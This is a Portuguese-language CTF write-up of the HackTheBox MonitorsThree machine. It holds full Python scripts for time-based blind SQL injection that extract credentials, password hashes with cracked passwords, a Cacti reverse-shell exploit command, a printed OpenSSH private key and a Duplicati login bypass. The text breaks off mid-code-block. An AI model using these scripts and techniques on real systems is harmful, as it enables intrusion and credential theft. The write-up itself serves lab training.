> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/pt-br/writeups-ctf/hackthebox/linux-medium/monitorsthree-hackthebox-writeup.md).

# Relato do HackTheBox MonitorsThree

{% embed url="<https://app.hackthebox.com/machines/622>" %}

{% hint style="warning" %}
**Habilidades:**

* Enumeração de subdomínios
* SQLI - Injeção cega manual baseada em tempo (Script em Python)
* Quebra de hashes
* Exploração do Cacti (CVE-2024-25642) - Importação de pacote malicioso
* Vazamento de Informações
* Exploração de serviço interno - Duplicati
* Abusando do Duplicati - Contornando a autenticação de login com a senha do servidor
* Duplicati - Criando um backup para leitura e gravação privilegiadas de arquivos (Escalonamento de privilégios)
  {% endhint %}

## Reconhecimento <a href="#reconnaissance" id="reconnaissance"></a>

**Configuração do ambiente de trabalho:**

Configure o ambiente de trabalho criando três pastas para armazenar conteúdo importante, exploits e resultados de reconhecimento do Nmap.

<figure><img src="/files/1c748ec97e0277e188388bc6c61cd67cd0a1178e" alt="" width="563"><figcaption></figcaption></figure>

**Verificação de conectividade da VPN**

Verifique a conectividade da VPN para garantir comunicação estável com a máquina-alvo.

<figure><img src="/files/42a104068f7c2758564c5e1f9f7ee3865f6a339e" alt="" width="563"><figcaption></figcaption></figure>

**Descoberta de portas abertas com Nmap:**

Enumere as portas abertas e exporte os resultados para o arquivo "allPorts" no diretório do Nmap:

```bash
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.30 -oG allPorts
```

<figure><img src="/files/b4ce43512dbfd0b1d90471b9b32596b1cd18eea4" alt="" width="563"><figcaption></figcaption></figure>

**Análise de portas abertas com extractPorts:**

Use a função extractPorts para exibir as portas abertas em um formato conciso e copiá-las para a área de transferência.

<figure><img src="/files/942ed1e8effba2fd2c30c04ea5f8376b8c06bee3" alt="" width="563"><figcaption></figcaption></figure>

**Varredura de versão de portas com Nmap:**

Use o Nmap para verificar as versões dos serviços e salvar a saída no arquivo "targeted":

```bash
nmap -sCV -p80,22 10.10.11.30 -oN targeted
```

<figure><img src="/files/e5135b43332d7ab99c3d87183ebf2e5de9f2fdd1" alt=""><figcaption></figcaption></figure>

Para resolver nomes de domínio em endereços IP via DNS, o nome de domínio associado ao seu endereço IP é inserido no `/etc/hosts` arquivo

<figure><img src="/files/60216f24d28befc8178c88e1e96cc0ea154c4be2" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/00926300cd5737f142d411c4c7867b9099c07114" alt=""><figcaption></figcaption></figure>

### Lista de diretórios:

**Pesquisar apenas** diretórios

```bash
gobuster dir -u http://monitorsthree.htb -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 200
```

<figure><img src="/files/5c21fe6faf61492b054f0c65c49be764dcbf00cc" alt=""><figcaption></figcaption></figure>

/*/* Pesquisar arquivos com extensões específicas (PHP, HTML, TXT) no diretório de administração:/*/*

```bash
gobuster dir -u http://monitorsthree.htb/admin/ -w /usr/share/SecLists/Discovery/Web-Content/quickhits.txt -t 50 -b '' -x html,php,txt -s 200
```

Encontramos o `db.php` arquivo, mas ele não contém nenhum dado.

<figure><img src="/files/5482458e4d366a19dd5839e2a55c01bcca88033e" alt=""><figcaption></figcaption></figure>

## Injeção de SQL

#### Detecção da vulnerabilidade

Identificamos uma vulnerabilidade de SQL no recurso "Esqueci minha senha". O seguinte payload foi usado para confirmar a vulnerabilidade:

```sql
admin' or 1=1-- -
```

<figure><img src="/files/6e9cc252efa7adbbb947fc714bf00920c4ef4da1" alt=""><figcaption></figcaption></figure>

#### Confirmação da vulnerabilidade com ataque baseado em tempo

Para confirmar a vulnerabilidade, usamos um ataque SQL baseado em tempo:

```sql
admin' and sleep(5)-- -
```

A resposta levou 5 segundos, confirmando assim a vulnerabilidade.

<figure><img src="/files/16aeddacdc943ce4d956650a3cd606364c93f7c0" alt=""><figcaption></figcaption></figure>

## **Injeção de SQL - Baseada em tempo**

#### Automatizar a exploração com um script Python

Desenvolvemos um script Python para automatizar a extração de dados via injeção de SQL. O script extraiu o nome do banco de dados, nomes de tabelas, colunas e, por fim, dados sensíveis como nomes de usuário e senhas.

### Banco de dados:

**Exemplo de script para extrair o nome do banco de dados:**

```bash
python3 exploit.py --url http://monitorsthree.htb/forgot_password.php --delay 1
```

```python
import sys
import signal
import time
import string
import requests
import argparse
import logging

# Configuração de log
logging.basicConfig(level=logging.INFO, format="%(asctime)s %(levelname)s %(message)s")
logger = logging.getLogger(__name__)

def def_handler(sig, frame):
    logger.info("/n/n[!] Saindo.../n")
    sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

def sqli(target_url, delay=1):
    characters = string.ascii_lowercase + string.digits + ":,_-."
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    extracted_data = ""
    logger.info("Iniciando ataque de injeção de SQL...")
    
    for position in range(1, 100):
        character_found = False  # Indicador para verificar se um caractere foi encontrado
        
        for character in characters:
            payload = {
                'username': f"admin' AND IF(SUBSTR(database(),{position},1)='{character}',SLEEP({delay}),1)-- -",
                'password': 'admin'
            }
            
            logger.debug(f"Testando: {payload['username']}")
            start_time = time.time()
            
            try:
                response = requests.post(target_url, data=payload, headers=headers, timeout=10)
            except requests.RequestException as e:
                logger.error(f"Falha na solicitação: {e}")
                continue
            
            elapsed_time = time.time() - start_time
            
            if elapsed_time >= delay:
                extracted_data += character
                logger.info(f"Dados extraídos até agora: {extracted_data}")
                character_found = True  # Um caractere foi encontrado
                break
        
        # Se nenhum caractere foi encontrado para esta posição, interrompa o loop
        if not character_found:
            logger.info(f"Nenhum caractere encontrado na posição {position}. Encerrando a extração.")
            break
    
    logger.info("Injeção de SQL concluída!")
    logger.info(f"Dados finais extraídos: {extracted_data}")

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Realizar um ataque de injeção de SQL baseado em tempo.")
    parser.add_argument("--url", required=True, help="URL de destino para a injeção de SQL")
    parser.add_argument("--delay", type=float, default=0.85, help="Tempo de atraso para a injeção de SQL")
    
    args = parser.parse_args()
    
    sqli(args.url, args.delay)
```

* **Nome do banco de dados**: `monitorsthree_db`

<figure><img src="/files/6b5570739a5311b5a40296cdfc3d837c3a084f40" alt=""><figcaption></figcaption></figure>

### **Bancos de dados:**

```python
import sys
import signal
import time
import string
import requests
import argparse
import logging

# Configuração de log
logging.basicConfig(level=logging.INFO, format="%(asctime)s %(levelname)s %(message)s")
logger = logging.getLogger(__name__)

def def_handler(sig, frame):
    logger.info("/n/n[!] Saindo.../n")
    sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

def extract_data(target_url, delay, query_template, offset):
    characters = string.ascii_lowercase + string.digits + "_;:,_-."
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    extracted_data = ""
    logger.info(f"Extraindo o nome do banco de dados no deslocamento {offset}...")
    
    for position in range(1, 100):
        character_found = False  # Indicador para verificar se um caractere foi encontrado
        
        for character in characters:
            # Formatar a solicitação SQL com todas as variáveis necessárias
            payload = {
                'username': query_template.format(offset=offset, position=position, character=character, delay=delay),
                'password': 'admin'
            }
            
            logger.debug(f"Testando: {payload['username']}")
            start_time = time.time()
            
            try:
                response = requests.post(target_url, data=payload, headers=headers, timeout=10)
            except requests.RequestException as e:
                logger.error(f"Falha na solicitação: {e}")
                continue
            
            elapsed_time = time.time() - start_time
            
            if elapsed_time >= delay:
                extracted_data += character
                logger.info(f"Dados extraídos até agora: {extracted_data}")
                character_found = True  # Um caractere foi encontrado
                break
        
        # Se nenhum caractere foi encontrado para esta posição, interrompa o loop
        if not character_found:
            logger.info(f"Nenhum caractere encontrado na posição {position}. Encerrando a extração.")
            break
    
    return extracted_data

def sqli(target_url, delay=1):
    # Solicitação para extrair nomes de bancos de dados
    query_template = (
        "admin' AND IF(SUBSTR((SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET {offset}),{position},1)='{character}',SLEEP({delay}),1)-- -"
    )
    
    databases = []
    offset = 0
    
    while True:
        database_name = extract_data(target_url, delay, query_template, offset)
        
        if not database_name:
            logger.info("Nenhum outro banco de dados encontrado.")
            break
        
        databases.append(database_name)
        logger.info(f"Banco de dados encontrado: {database_name}")
        offset += 1
    
    logger.info("Injeção de SQL concluída!")
    logger.info(f"Lista de bancos de dados: {databases}")

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Realizar um ataque de injeção de SQL baseado em tempo.")
    parser.add_argument("--url", required=True, help="URL de destino para a injeção de SQL")
    parser.add_argument("--delay", type=float, default=0.85, help="Tempo de atraso para a injeção de SQL")
    
    args = parser.parse_args()
    
    sqli(args.url, args.delay)
```

#### **information/\_schema, monitorthree/\_db**

<figure><img src="/files/2f26941f959d790baa09a849c7de5e597e2dfc5d" alt=""><figcaption></figcaption></figure>

### **Tabelas:**

```python
import sys
import signal
import time
import string
import requests
import argparse
import logging

# Configuração de log
logging.basicConfig(level=logging.INFO, format="%(asctime)s %(levelname)s %(message)s")
logger = logging.getLogger(__name__)

def def_handler(sig, frame):
    logger.info("/n/n[!] Saindo.../n")
    sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

def extract_data(target_url, delay, query_template, offset):
    characters = string.ascii_lowercase + string.digits + ":,_-."
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    extracted_data = ""
    logger.info(f"Extraindo o nome da tabela no deslocamento {offset}...")
    
    for position in range(1, 100):
        character_found = False  # Indicador para verificar se um caractere foi encontrado
        
        for character in characters:
            # Formatar a solicitação SQL com todas as variáveis necessárias
            payload = {
                'username': query_template.format(offset=offset, position=position, character=character, delay=delay),
                'password': 'admin'
            }
            
            logger.debug(f"Testando: {payload['username']}")
            start_time = time.time()
            
            try:
                response = requests.post(target_url, data=payload, headers=headers, timeout=10)
            except requests.RequestException as e:
                logger.error(f"Falha na solicitação: {e}")
                continue
            
            elapsed_time = time.time() - start_time
            
            if elapsed_time >= delay:
                extracted_data += character
                logger.info(f"Dados extraídos até agora: {extracted_data}")
                character_found = True  # Um caractere foi encontrado
                break
        
        # Se nenhum caractere foi encontrado para esta posição, interrompa o loop
        if not character_found:
            logger.info(f"Nenhum caractere encontrado na posição {position}. Encerrando a extração.")
            break
    
    return extracted_data

def sqli(target_url, delay=0.85):
    # Solicitação para extrair nomes de tabelas do banco de dados `monitorsthree_db`
    query_template = (
        "admin' AND IF(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema='monitorsthree_db' LIMIT 1 OFFSET {offset}),{position},1)='{character}',SLEEP({delay}),1)-- -"
    )
    
    tables = []
    offset = 0
    
    while True:
        table_name = extract_data(target_url, delay, query_template, offset)
        
        if not table_name:
            logger.info("Nenhuma outra tabela encontrada.")
            break
        
        tables.append(table_name)
        logger.info(f"Tabela encontrada: {table_name}")
        offset += 1
    
    logger.info("Injeção de SQL concluída!")
    logger.info(f"Lista de tabelas em monitorsthree_db: {tables}")

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Realizar um ataque de injeção de SQL baseado em tempo.")
    parser.add_argument("--url", required=True, help="URL de destino para a injeção de SQL")
    parser.add_argument("--delay", type=float, default=0.85, help="Tempo de atraso para a injeção de SQL")
    
    args = parser.parse_args()
    
    sqli(args.url, args.delay)
```

* **Tabelas** : `invoices`, `customers`, `changelog`, `tasks`, `invoice_tasks`, `users`

<figure><img src="/files/c6e74f58713dd08dcba57c2b5624a2e6d0ee411c" alt=""><figcaption></figcaption></figure>

### **Colunas:**

```python
import sys
import signal
import time
import string
import requests
import argparse
import logging

# Configuração de log
logging.basicConfig(level=logging.INFO, format="%(asctime)s %(levelname)s %(message)s")
logger = logging.getLogger(__name__)

def def_handler(sig, frame):
    logger.info("/n/n[!] Saindo.../n")
    sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

def extract_data(target_url, delay, query_template, offset):
    characters = string.ascii_lowercase + string.digits + ":,_-."
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    extracted_data = ""
    logger.info(f"Extraindo o nome da coluna no deslocamento {offset}...")
    
    for position in range(1, 100):
        character_found = False  # Indicador para verificar se um caractere foi encontrado
        
        for character in characters:
            # Formatar a solicitação SQL com todas as variáveis necessárias
            payload = {
                'username': query_template.format(offset=offset, position=position, character=character, delay=delay),
                'password': 'admin'
            }
            
            logger.debug(f"Testando: {payload['username']}")
            start_time = time.time()
            
            try:
                response = requests.post(target_url, data=payload, headers=headers, timeout=10)
            except requests.RequestException as e:
                logger.error(f"Falha na solicitação: {e}")
                continue
            
            elapsed_time = time.time() - start_time
            
            if elapsed_time >= delay:
                extracted_data += character
                logger.info(f"Dados extraídos até agora: {extracted_data}")
                character_found = True  # Um caractere foi encontrado
                break
        
        # Se nenhum caractere foi encontrado para esta posição, interrompa o loop
        if not character_found:
            logger.info(f"Nenhum caractere encontrado na posição {position}. Encerrando a extração.")
            break
    
    return extracted_data

def sqli(target_url, delay=0.85):
    # Solicitação para extrair nomes de colunas da tabela `users`
    query_template = (
        "admin' AND IF(SUBSTR((SELECT column_name FROM information_schema.columns WHERE table_schema='monitorsthree_db' AND table_name='users' LIMIT 1 OFFSET {offset}),{position},1)='{character}',SLEEP({delay}),1)-- -"
    )
    
    columns = []
    offset = 0
    
    while True:
        column_name = extract_data(target_url, delay, query_template, offset)
        
        if not column_name:
            logger.info("Nenhuma outra coluna encontrada.")
            break
        
        columns.append(column_name)
        logger.info(f"Coluna encontrada: {column_name}")
        offset += 1
    
    logger.info("Injeção de SQL concluída!")
    logger.info(f"Lista de colunas na tabela 'users': {columns}")

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Realizar um ataque de injeção de SQL baseado em tempo.")
    parser.add_argument("--url", required=True, help="URL de destino para a injeção de SQL")
    parser.add_argument("--delay", type=float, default=0.85, help="Tempo de atraso para a injeção de SQL")
    
    args = parser.parse_args()
    
    sqli(args.url, args.delay)
```

* **Colunas na `users` tabela**: `id`, `nome de usuário`, `email`, `senha`, `parâmetro`, `posição`, `dob`, `start_date`, `salary`

<figure><img src="/files/ff7c8b01af9609fc90f0161d10e3f9a2f0acf9ea" alt=""><figcaption></figcaption></figure>

### **Dados extraídos**:

```python
import sys
import signal
import time
import string
import requests
import argparse
import logging

# Configuração de log
logging.basicConfig(level=logging.INFO, format="%(asctime)s %(levelname)s %(message)s")
logger = logging.getLogger(__name__)

def def_handler(sig, frame):
    logger.info("/n/n[!] Saindo.../n")
    sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

def extract_data(target_url, delay, query_template, offset):
    characters = string.ascii_lowercase + string.digits + ":,_-."
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    extracted_data = ""
    logger.info(f"Extraindo dados no deslocamento {offset}...")
    
    for position in range(1, 100):
        character_found = False  # Indicador para verificar se um caractere foi encontrado
        
        for character in characters:
            # Formatar a solicitação SQL com todas as variáveis necessárias
            payload = {
                'username': query_template.format(offset=offset, position=position, character=character, delay=delay),
                'password': 'admin'
            }
            
            logger.debug(f"Testando: {payload['username']}")
            start_time = time.time()
            
            try:
                response = requests.post(target_url, data=payload, headers=headers, timeout=10)
            except requests.RequestException as e:
                logger.error(f"Falha na solicitação: {e}")
                continue
            
            elapsed_time = time.time() - start_time
            
            if elapsed_time >= delay:
                extracted_data += character
                logger.info(f"Dados extraídos até agora: {extracted_data}")
                character_found = True  # Um caractere foi encontrado
                break
        
        # Se nenhum caractere foi encontrado para esta posição, interrompa o loop
        if not character_found:
            logger.info(f"Nenhum caractere encontrado na posição {position}. Encerrando a extração.")
            break
    
    return extracted_data

def extract_credentials(target_url, delay=0.85):
    # Solicitação para extrair nomes de usuário
    username_query_template = (
        "admin' AND IF(SUBSTR((SELECT username FROM users LIMIT 1 OFFSET {offset}),{position},1)='{character}',SLEEP({delay}),1)-- -"
    )
    
    # Solicitação para extrair senhas
    password_query_template = (
        "admin' AND IF(SUBSTR((SELECT password FROM users LIMIT 1 OFFSET {offset}),{position},1)='{character}',SLEEP({delay}),1)-- -"
    )
    
    credentials = []
    offset = 0
    
    while True:
        username = extract_data(target_url, delay, username_query_template, offset)
        password = extract_data(target_url, delay, password_query_template, offset)
        
        if not username or not password:
            logger.info("Nenhuma outra credencial encontrada.")
            break
        
        credentials.append((username, password))
        logger.info(f"Credenciais encontradas: {username}:{password}")
        offset += 1
    
    logger.info("Injeção de SQL concluída!")
    logger.info(f"Lista de credenciais: {credentials}")

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Realizar um ataque de injeção de SQL baseado em tempo para extrair credenciais.")
    parser.add_argument("--url", required=True, help="URL de destino para a injeção de SQL")
    parser.add_argument("--delay", type=float, default=0.85, help="Tempo de atraso para a injeção de SQL")
    
    args = parser.parse_args()
    
    extract_credentials(args.url, args.delay)
```

<figure><img src="/files/848341f31085838d71a1ec8af65390151daa383a" alt=""><figcaption></figcaption></figure>

* `admin:31a181c8372e3afc59dab863430610e8`
* `mwatson:c585d01f2eb3e6e1073e92023088a3dd`
* `janderson:1e68b6eb86b45f6d92f8f292428f77ac`
* `dthompson:633b683cc128fe244b00f176c8a950f5`

## Quebra de senhas

{% embed url="<https://crackstation.net/>" %}

Usamos **CrackStation** para quebrar senhas com hash. As seguintes credenciais foram obtidas:

<figure><img src="/files/01fea2cb99f89f32c078b19e3aed3ef3a036d0bc" alt=""><figcaption></figcaption></figure>

**Identificadores:**

* Usuário: `admin`
* Senha: `greencacti2001`

<figure><img src="/files/839da5990dbe65fdab7bfc32c2accf8dd0ab6736" alt=""><figcaption></figcaption></figure>

### /*/* Lista de subdomínios\:/*/*

Usando o comando Gobuster para enumerar subdomínios:

```bash
gobuster vhost -u http://monitorsthree.htb --append-domain -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
```

Encontramos o `cacti.monitorsthree.htb` subdomínio.

<figure><img src="/files/4ec4cd636b7b1c5ef8cf53ec39c9f698561ce037" alt=""><figcaption></figcaption></figure>

Adicionamos esta entrada em `/etc/hosts`.

<figure><img src="/files/17d9b07fb23876fe11674ce1d7bf3a8049733172" alt=""><figcaption></figcaption></figure>

**Acesso ao painel de conexão do Cacti:**

O painel de conexão do Cacti, versão 1.2.26, está disponível neste subdomínio. Com `admin:greencacti2001` credenciais, conseguimos nos conectar.

<figure><img src="/files/38bd3dbaa9179efc493e480679d5211a4e50bfd3" alt=""><figcaption></figcaption></figure>

## Exploração da vulnerabilidade RCE do Cacti <a href="#cacti-rce-vulnerability-exploitation" id="cacti-rce-vulnerability-exploitation"></a>

{% embed url="<https://github.com/5ma1l/CVE-2024-25641>" %}

Para explorar a vulnerabilidade NCE do Cacti, modificaremos um arquivo PHP e executaremos um script de exploração:

<figure><img src="/files/e6261e3992756b9bf6dd6de81de959f5930df61a" alt=""><figcaption></figcaption></figure>

Este script cria um arquivo compactado contendo um payload PHP que será injetado no servidor de destino, permitindo-nos obter uma reverse shell.

{% code overflow="wrap" fullWidth="false" %}

```bash
python3 exploit.py http://cacti.monitorsthree.htb/cacti/ admin greencacti2001 -p php/monkey.php
```

{% endcode %}

<div data-full-width="true"><figure><img src="/files/171055ea609d4503ec38064048d99eb29693d00f" alt=""><figcaption></figcaption></figure></div>

## **Elevação de privilégios :**

Ao explorar o `/var/www/html` diretório web, encontramos arquivos de banco de dados na `cacti` pasta, incluindo o `config.php` arquivo de configuração localizado em `/var/www/html/cacti/include/config.php`.

Trechos de `config.php`:

```php
$database_username = 'cactiuser';
$database_password = 'cactiuser';
$database_port = '3306';
```

<figure><img src="/files/60f2e4f8e78770bbae5eb4f8ed58c33e124c614f" alt=""><figcaption></figcaption></figure>

Em seguida, listamos usuários na `user_auth` tabela no `cacti` banco de dados:

<figure><img src="/files/624fc7ab185148bc735bd4ff7934f733a70b8001" alt=""><figcaption></figcaption></figure>

```sql
Select * from user_auth
```

<div data-full-width="true"><figure><img src="/files/e7fa2088c549c130d39e6ac08c93fb3b8f4ed2e5" alt=""><figcaption></figcaption></figure></div>

Usamos `john` para quebrar as senhas recuperadas:

```bash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
```

Isso revela o diretório `marcus` senha do usuário: `12345678910`.

<figure><img src="/files/fe9f9c7630a6dc50aa8e9742ebfd46657afe0771" alt=""><figcaption></figcaption></figure>

### Flag user.txt :)

<figure><img src="/files/0a416036820a053e0ae42aa5113f5d657b6a07c0" alt=""><figcaption></figcaption></figure>

Após esta etapa, também obtemos a `marcus` chave SSH do usuário:

<figure><img src="/files/12a48a3f2d6e909f0413d8ee955a47897235b4c4" alt=""><figcaption></figcaption></figure>

```
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
```

Primeiro, observaremos as portas abertas internamente com o seguinte comando:

```bash
netstat -nltp
```

<figure><img src="/files/884404e7ea828f63f05c43f09cae2d1c6f028126" alt="" width="563"><figcaption></figcaption></figure>

Vamos redirecionar a porta interna **8200** do servidor para nossa máquina local para acessá-la pelo navegador. Esse redirecionamento pode ser feito via SSH com o seguinte comando:

```bash
ssh -i id_rsa -L 8200:127.0.0.1:8200 marcus@10.10.11.30 -N
```

## Exploração do Duplicati:

### Bypass de autenticação de login do Duplicati

{% embed url="<https://github.com/duplicati/duplicati/issues/5197>" %}

Durante a análise da máquina-alvo, um **Duplicati** portal web foi descoberto. Esse portal tinha um painel de autenticação pedindo uma senha.

<figure><img src="/files/d3246ebb259b65bf87bd59e69c3bb5512e18eaba" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
Duplicati é um cliente de backup que armazena com segurança backups remotos criptografados, incrementais e compactados de arquivos locais em serviços de armazenamento em nuvem e servidores de arquivos
{% endhint %}

Ao explorar o sistema, o diretório de configuração do Duplicati foi localizado em `/opt/duplicati`. Um arquivo SQLite chamado `Duplicati-server.sqlite` foi identificado como potencialmente contendo informações sensíveis.

<figure><img src="/files/36d7712ff2702a4c5f81d4aa0256610fc04f1726" alt=""><figcaption></figcaption></figure>

#### Baixar arquivo SQLite

Para analisar este arquivo, ele foi baixado para nossa máquina local usando um servidor HTTP Python:

```bash
python3 -m http.server 4444
```

```bash
wget http://10.10.11.30:4444/Duplicati-server.sqlite
```

<figure><img src="/files/cece648e2da1fa1b585dfd117c1c249182ebc767" alt=""><figcaption></figcaption></figure>

#### Análise do arquivo SQLite

O arquivo foi aberto com a `sqlite3` ferramenta para revisar seu conteúdo:

```bash
sqlite3 Duplicati-server.sqlite
```

As tabelas foram listadas, e a `opção` tabela foi selecionada para extração de dados:

```sql
.tables
select * from option;
```

<figure><img src="/files/606adfc2ce0f2cca495cec94b857a27dedf4fad8" alt=""><figcaption></figcaption></figure>

| Chave                             | Valor                                          |
| --------------------------------- | ---------------------------------------------- |
| `server-passphrase`               | `Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=` |
| `server-passphrase-salt`          | `xTfykWV1dATpFZvPhClEJLJzYA5A4L74hX7FK8XmY0I=` |
| `server-passphrase-trayicon`      | `ce13157b-a06e-4b60-811d-60d294e8d0ae`         |
| `server-passphrase-trayicon-hash` | `L6FxIB9fOxk9uueTx270v9+1OQIJFfV7GfyN3pA83WE=` |

#### Conversão da frase-senha

O valor de `server-passphrase` está codificado em Base64. Para decodificá-lo e convertê-lo para o formato hexadecimal, o seguinte comando é usado:

```bash
echo "Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=" | base64 -d | xxd -p -c 256
```

<figure><img src="/files/d389e60ff77064bdc0d513719f02e15566ef898f" alt=""><figcaption></figcaption></figure>

#### Isso gerou o seguinte valor hexadecimal:

```excel-formula
59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a
```

### Cálculo da senha final

Para gerar a senha final, as seguintes etapas foram realizadas no console do navegador:

**Definição da senha com salt**:

```javascript
var saltedpwd = '59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a';
```

### Interceptação da solicitação com o Burp Suite

Interceptamos a solicitação e a enviamos para interceptar -> responder a esta solicitação e então clicamos em forward.

<figure><img src="/files/64acd6127f72c2c499bc5f22cfcb5f86b6ef9745" alt=""><figcaption></figcaption></figure>

Uma solicitação HTTP foi interceptada com **Burp Suite** revelando as seguintes informações:

<figure><img src="/files/66a2b36c9ba3cf0df0d954a213526d66bb2992dc" alt=""><figcaption></figcaption></figure>

```json
{
  "Status": "OK",
  "Nonce": "ktDnBGnG6jQzWjtajOoaS5Z+8z6z+aI2KA1p7lMTKWk=",
  "Salt": "xTfykWV1dATpFZvPhClEJLJzYA5A4L74hX7FK8XmY0I="
}
```

O campo `Salt` corresponde ao valor `server-passphrase-salt` extraído do banco de dados

**Cálculo da senha nonce:**

{% code overflow="wrap" %}

```javascript
